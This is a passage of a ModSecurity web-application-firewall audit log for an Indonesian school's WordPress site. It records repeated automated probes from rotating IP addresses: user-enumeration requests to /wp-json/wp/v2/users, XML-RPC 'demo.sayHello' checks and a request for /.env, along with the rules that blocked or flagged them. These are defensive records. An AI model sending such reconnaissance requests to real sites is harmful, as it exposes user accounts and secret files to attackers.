103.236.140.4 X-Forwarded-For: 37.187.139.239 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0 Safari/537.36 Accept: */* --70977b50-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --70977b50-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747446746383183 745 (- - -) Stopwatch2: 1747446746383183 745; combined=309, p1=271, p2=0, p3=0, p4=0, p5=38, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70977b50-Z-- --d7a46366-A-- [17/May/2025:08:52:30 +0700] aCfr3um4kjNN-hEbWjJBWQAAAE4 103.236.140.4 44546 103.236.140.4 8181 --d7a46366-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.90.183 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.90.183 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d7a46366-C-- demo.sayHello --d7a46366-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7a46366-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747446750786679 6408 (- - -) Stopwatch2: 1747446750786679 6408; combined=4663, p1=617, p2=3805, p3=38, p4=42, p5=97, sr=78, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7a46366-Z-- --0bb3917f-A-- [17/May/2025:08:53:56 +0700] aCfsNHyxdQCiyU1ENFcn8QAAAAo 103.236.140.4 44568 103.236.140.4 8181 --0bb3917f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.33 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.33 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0bb3917f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0bb3917f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747446836372557 3335 (- - -) Stopwatch2: 1747446836372557 3335; combined=1453, p1=490, p2=931, p3=0, p4=0, p5=32, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0bb3917f-Z-- --58ae7d04-A-- [17/May/2025:08:53:59 +0700] aCfsNxKi5m5upc8uMd6iSgAAAMI 103.236.140.4 44572 103.236.140.4 8181 --58ae7d04-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.33 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.33 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --58ae7d04-C-- demo.sayHello --58ae7d04-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --58ae7d04-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747446839618587 5677 (- - -) Stopwatch2: 1747446839618587 5677; combined=4128, p1=596, p2=3313, p3=29, p4=31, p5=93, sr=131, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58ae7d04-Z-- --4d3bb306-A-- [17/May/2025:08:55:55 +0700] aCfsq-m4kjNN-hEbWjJBXQAAAFg 103.236.140.4 44622 103.236.140.4 8181 --4d3bb306-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.175 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4d3bb306-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d3bb306-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747446955288457 2831 (- - -) Stopwatch2: 1747446955288457 2831; combined=1251, p1=428, p2=792, p3=0, p4=0, p5=31, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d3bb306-Z-- --6ab99129-A-- [17/May/2025:08:56:00 +0700] aCfssATOsBn9MSWb6WJu6AAAAIY 103.236.140.4 44626 103.236.140.4 8181 --6ab99129-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.175 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.175 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6ab99129-C-- demo.sayHello --6ab99129-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6ab99129-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747446960990544 6426 (- - -) Stopwatch2: 1747446960990544 6426; combined=4654, p1=615, p2=3803, p3=39, p4=42, p5=93, sr=77, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ab99129-Z-- --8b2d765a-A-- [17/May/2025:08:57:46 +0700] aCftGum4kjNN-hEbWjJBYQAAAEQ 103.236.140.4 44656 103.236.140.4 8181 --8b2d765a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.182.121 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.182.121 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8b2d765a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b2d765a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747447066464160 2847 (- - -) Stopwatch2: 1747447066464160 2847; combined=1358, p1=442, p2=881, p3=0, p4=0, p5=34, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b2d765a-Z-- --3b71bc38-A-- [17/May/2025:08:57:53 +0700] aCftIQTOsBn9MSWb6WJu6gAAAIg 103.236.140.4 44662 103.236.140.4 8181 --3b71bc38-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.182.121 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.182.121 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3b71bc38-C-- demo.sayHello --3b71bc38-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b71bc38-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747447073120990 4914 (- - -) Stopwatch2: 1747447073120990 4914; combined=3741, p1=479, p2=3060, p3=24, p4=25, p5=90, sr=89, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b71bc38-Z-- --6f5da736-A-- [17/May/2025:08:58:48 +0700] aCftWHyxdQCiyU1ENFcoDQAAABY 103.236.140.4 44670 103.236.140.4 8181 --6f5da736-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.9 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.9 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6f5da736-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6f5da736-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747447128601056 2949 (- - -) Stopwatch2: 1747447128601056 2949; combined=1331, p1=458, p2=841, p3=0, p4=0, p5=31, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6f5da736-Z-- --377bf930-A-- [17/May/2025:08:58:55 +0700] aCftX-m4kjNN-hEbWjJBZAAAAEs 103.236.140.4 44674 103.236.140.4 8181 --377bf930-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.9 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.9 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --377bf930-C-- demo.sayHello --377bf930-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --377bf930-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747447135447741 5630 (- - -) Stopwatch2: 1747447135447741 5630; combined=4125, p1=564, p2=3338, p3=32, p4=35, p5=92, sr=81, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --377bf930-Z-- --70977b50-A-- [17/May/2025:08:59:25 +0700] aCftfem4kjNN-hEbWjJBZgAAAE0 103.236.140.4 44680 103.236.140.4 8181 --70977b50-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.220 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.220 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --70977b50-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --70977b50-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747447165886428 3438 (- - -) Stopwatch2: 1747447165886428 3438; combined=1495, p1=485, p2=976, p3=0, p4=0, p5=34, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70977b50-Z-- --51366b65-A-- [17/May/2025:08:59:37 +0700] aCftiem4kjNN-hEbWjJBagAAAFM 103.236.140.4 44690 103.236.140.4 8181 --51366b65-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.220 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.220 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --51366b65-C-- demo.sayHello --51366b65-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --51366b65-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747447177874577 6541 (- - -) Stopwatch2: 1747447177874577 6541; combined=4815, p1=623, p2=3967, p3=37, p4=41, p5=89, sr=78, sw=58, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --51366b65-Z-- --64e1512b-A-- [17/May/2025:08:59:49 +0700] aCftlQTOsBn9MSWb6WJu7QAAAIo 103.236.140.4 44694 103.236.140.4 8181 --64e1512b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.104.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.104.222 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --64e1512b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --64e1512b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747447189856516 3251 (- - -) Stopwatch2: 1747447189856516 3251; combined=1406, p1=482, p2=893, p3=0, p4=0, p5=31, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --64e1512b-Z-- --18857274-A-- [17/May/2025:08:59:55 +0700] aCftm3yxdQCiyU1ENFcoDwAAAAE 103.236.140.4 44698 103.236.140.4 8181 --18857274-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.104.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.104.222 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --18857274-C-- demo.sayHello --18857274-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --18857274-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747447195739497 5739 (- - -) Stopwatch2: 1747447195739497 5739; combined=4232, p1=545, p2=3463, p3=32, p4=36, p5=92, sr=77, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --18857274-Z-- --63377234-A-- [17/May/2025:09:00:48 +0700] aCft0ATOsBn9MSWb6WJu7wAAAJE 103.236.140.4 44712 103.236.140.4 8181 --63377234-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.73 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.73 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --63377234-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --63377234-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747447248929780 3292 (- - -) Stopwatch2: 1747447248929780 3292; combined=1479, p1=495, p2=952, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --63377234-Z-- --37519133-A-- [17/May/2025:09:00:59 +0700] aCft2wTOsBn9MSWb6WJu8QAAAJQ 103.236.140.4 44716 103.236.140.4 8181 --37519133-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.73 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.73 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --37519133-C-- demo.sayHello --37519133-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --37519133-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747447259857232 5495 (- - -) Stopwatch2: 1747447259857232 5495; combined=4064, p1=521, p2=3311, p3=40, p4=34, p5=94, sr=74, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --37519133-Z-- --d151e660-A-- [17/May/2025:09:08:56 +0700] aCfvuOm4kjNN-hEbWjJBkwAAAFQ 103.236.140.4 44894 103.236.140.4 8181 --d151e660-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.72.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.72.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d151e660-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d151e660-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747447736327883 2989 (- - -) Stopwatch2: 1747447736327883 2989; combined=1224, p1=447, p2=747, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d151e660-Z-- --28aa8000-A-- [17/May/2025:09:09:01 +0700] aCfvvQTOsBn9MSWb6WJu-AAAAIU 103.236.140.4 44900 103.236.140.4 8181 --28aa8000-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.72.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.72.2 